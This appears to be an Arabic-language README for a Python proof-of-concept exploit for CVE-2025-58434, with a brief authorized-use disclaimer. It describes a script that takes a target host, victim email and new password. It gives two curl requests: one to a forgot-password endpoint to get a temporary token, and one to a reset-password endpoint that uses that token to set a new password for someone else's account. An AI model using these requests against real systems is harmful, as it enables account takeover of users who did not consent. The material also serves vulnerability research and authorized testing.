
CVE-2025-58434 إثبات المفهوم
نص برمجي بلغة بايثون لإثبات المفهوم لاستدعاء POST /api/v1/account/forgot-password.
⚠️ لأغراض التعليم والبحث الأمني المصرّح به فقط. تشغيل هذه الأداة ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا لاختبارها يعدّ غير قانوني.
zaddy6 (Isaac David)arthurgervais (Arthur Gervais)CVE-2025-58434poc.py: يطلب عنوان URL/IP الخاص بالجهاز، والبروتوكول اختياريًا عند استخدام host/IP مجرد، والبريد الإلكتروني المستهدف، وكلمة المرور؛ ثم يرسل الطلب ويطبع حالة HTTP والترويسات ونص الاستجابة بشكل مشابه لـ curl -iشغّل:
python3 poc.py
ثم أدخل:
10.10.11.10 أو http://10.10.11.10 أو https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/account/forgot-password \
-H "Content-Type: application/json" \
-d '{"user":{"email":"<[email protected]>"}}'
curl -i -X POST https://<target>/api/v1/account/reset-password \
-H "Content-Type: application/json" \
-d '{
"user":{
"email":"<[email protected]>",
"tempToken":"<tempToken>",
"password":"NewSecurePassword123!"
}
}'